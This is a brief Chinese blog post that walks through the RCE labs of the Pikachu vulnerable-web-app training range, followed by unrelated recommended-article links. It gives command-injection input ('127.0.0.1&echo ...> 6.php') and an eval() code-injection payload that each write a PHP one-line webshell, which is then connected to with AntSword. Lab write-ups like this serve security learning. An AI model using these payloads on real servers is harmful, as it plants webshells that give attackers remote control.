Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
March.s2 分钟前
Nginx 服务器反向代理实战指南
服务器·nginx·github
刚入门的大一新生23 分钟前
Linux-Linux第一个系统程序-进度条
linux·运维·服务器
梦想的旅途227 分钟前
企业微信自动化实战:客户资料自动修改与备注同步
运维·自动化·企业微信
梦想的旅途236 分钟前
企业微信自动化实战:客户通讯录备份与关系自动迁移
运维·自动化·企业微信
FlightYe1 小时前
linux系统编程(八):阻塞与非阻塞IO对比
android·linux·运维·服务器·github·vim
淮北4941 小时前
ubuntu22 默认输入法调整频率
运维·服务器·git·ubuntu·elasticsearch
土星云SaturnCloud1 小时前
大坝结构安全智能诊断:土星云边缘计算全周期管控实践
服务器·人工智能·安全·ai·边缘计算
Percep_gan1 小时前
切割服务器日志
运维·服务器
(Charon)2 小时前
【C++】线程安全队列(三):MPSC无锁队列、atomic与链表节点实现
c++·安全·链表
农村小镇哥2 小时前
C#读取CSV文件的方法
服务器·数据库·c#